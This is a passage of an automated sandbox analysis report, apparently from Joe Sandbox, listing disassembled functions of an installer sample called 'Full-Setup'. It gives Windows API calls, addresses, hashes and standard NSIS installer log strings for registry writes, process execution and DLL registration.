                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                          • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                            • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                            • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                          • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                          • API String ID: 565278875-3368763019
                                                                                                                                                                          • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                          • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                          • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                          • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                          APIs
                                                                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                          • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                          • String ID: F
                                                                                                                                                                          • API String ID: 941294808-1304234792
                                                                                                                                                                          • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                          • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                          • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                          • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                          • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          Strings
                                                                                                                                                                          • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                          • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                          • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                          • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                          • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                          • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                          • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                          • API String ID: 1641139501-220328614
                                                                                                                                                                          • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                          • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                          • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                          • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                          APIs
                                                                                                                                                                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                          • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                          • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                          • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                          • API String ID: 3734993849-3206598305
                                                                                                                                                                          • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                          • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                          • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                          • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                          APIs
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                          • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                          Strings
                                                                                                                                                                          • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                          • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                          • API String ID: 3294113728-3145124454
                                                                                                                                                                          • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                          • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                          • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                          • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427773,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427773,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427773,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                          Strings
                                                                                                                                                                          • `G, xrefs: 0040246E
                                                                                                                                                                          • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                          • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                          • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                          • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                          • API String ID: 1033533793-4193110038
                                                                                                                                                                          • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                          • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                          • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                          • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                          • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                          • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                                                          • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                          • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                          • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                          • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427773,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427773,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427773,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                            • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                            • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                          Strings
                                                                                                                                                                          • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                          • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                          • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                          • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                          • API String ID: 2014279497-3433828417
                                                                                                                                                                          • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                          • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                          • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                          • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                          • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                                                          • String ID: f
                                                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                                                          • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                          • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                          • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                          • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                          • MulDiv.KERNEL32(00043800,00000064,0013A08C), ref: 00403295
                                                                                                                                                                          • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
